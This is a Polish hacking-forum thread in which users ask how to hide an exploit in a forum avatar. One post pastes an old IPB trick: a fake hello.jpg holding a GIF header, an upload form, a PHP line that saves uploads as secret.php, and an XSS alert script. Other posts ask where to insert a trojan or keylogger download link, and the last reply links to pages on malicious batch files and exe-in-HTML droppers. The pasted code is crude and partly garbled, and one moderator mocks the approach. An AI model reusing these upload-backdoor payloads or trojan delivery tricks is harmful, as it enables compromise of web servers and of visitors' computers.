Explolit w Awatarze jak?
- Thread starter RyBek
- Rozpoczęty
- Status
To zależy gdzie chcesz użyc awataru. Możesz na forum ale ma ono filtrowanie więc musiałbyś się wygimnastykować albo znaleść wersję podatną na to.
Jak schować exploit jakiś w avatar? Php i tworzenie obrazków. Możesz przechwycać np. sesje i zapysywać gdzieś ale tak jak pisałem. Nowsze wersje są odporne na takie manewry.
Jak schować exploit jakiś w avatar? Php i tworzenie obrazków. Możesz przechwycać np. sesje i zapysywać gdzieś ale tak jak pisałem. Nowsze wersje są odporne na takie manewry.
znalazłem dziś coś takiego:
IPB php jpg upload
now go and upload it as your avatar, check the url of your avatar and you'll see.
Po angielsku ale no chyba skumacie oco chodzi ;] pozniej moge przetlumaczyc jak juz ktos nie rozumie...
PS. dziala na stare wersje IPB ;]
IPB php jpg upload
Kod:
This can perhaps leed to a vonerability. (only works i internet explorer)
open notedpad and save the following as hello.jpg
Kod:
<GIF89a? 8 ??f???>
<html>
<head>
<title>Secret :: gifz</title>
</head>
</body>
<center>
<table width=75% border=1>
<tr>
<td bgcolor=gray>
<center>[u][b]By SecreT</font>[/b][/u]</center>
<FORM ENCTYPE="multipart/form-data" ACTION="upload.php" METHOD="POST">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
Send this file: <INPUT NAME="userfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<?
move_uploaded_file($userfile, "secret.php");
?>
</body>
</html></body></html>
<html><body><script>alert('hello:D');</script></body></html>Po angielsku ale no chyba skumacie oco chodzi ;] pozniej moge przetlumaczyc jak juz ktos nie rozumie...
PS. dziala na stare wersje IPB ;]
Error_PL
ci mega HAxsi0rzy widac ze z tibii wzieci^^
Wez mi tylko powiedz gdzie wpisuje sie adres do serwera bo jesli dobrze zroumialem to dziala to tak ze pobiera i wlancza trojana....
I rozumiem ze ten serwer trojana ma byc na ftp..
Ale gdzie wpisac do niego linka
ci mega HAxsi0rzy widac ze z tibii wzieci^^
Wez mi tylko powiedz gdzie wpisuje sie adres do serwera bo jesli dobrze zroumialem to dziala to tak ze pobiera i wlancza trojana....
I rozumiem ze ten serwer trojana ma byc na ftp..
Ale gdzie wpisac do niego linka
grzonu
Były Moderator
- Dołączył
- Grudzień 26, 2006
- Posty
- 1390
LOL
Normalnie zj***lem sie z krzesla jak to czytałem!
jak nawet zbindujesz jpg z serwerem to nie bedzie to juz jpg tylko exe czyli plik wykonywalny i juz jako avatar nie wrzucisz. a jak zmienisz rozszerzenie na jpg to ci sie serwerek nie odpali bo to juz nie jest plik wykonywalny!!! bylo juz o tym z 100 razy nie binduje sie z *.jpg
Normalnie zj***lem sie z krzesla jak to czytałem!
jak nawet zbindujesz jpg z serwerem to nie bedzie to juz jpg tylko exe czyli plik wykonywalny i juz jako avatar nie wrzucisz. a jak zmienisz rozszerzenie na jpg to ci sie serwerek nie odpali bo to juz nie jest plik wykonywalny!!! bylo juz o tym z 100 razy nie binduje sie z *.jpg
grzonu
Były Moderator
- Dołączył
- Grudzień 26, 2006
- Posty
- 1390
Originally posted by RyBek
jak dobrze rozumiem expolot jest to skrypt skury zapisuje sie na kopie ofiary i sciaga tam naszego trojana/keyloger/itp.
To w takiem tazie gdzie mam wpisac w kodzie adres trojana/keyloger/itp.
Jak Dobrze to rozumiem
jest naprzykład trojan downloader ale jest wykrywany przez wszystkie av. ale wrzucasz go jako skrypt java na stronke albo tu >> http://www.dawpi.info/txt/zlosliwe_batche.html
http://www.dawpi.info/txt/exe_na_html.html << albo to
- Status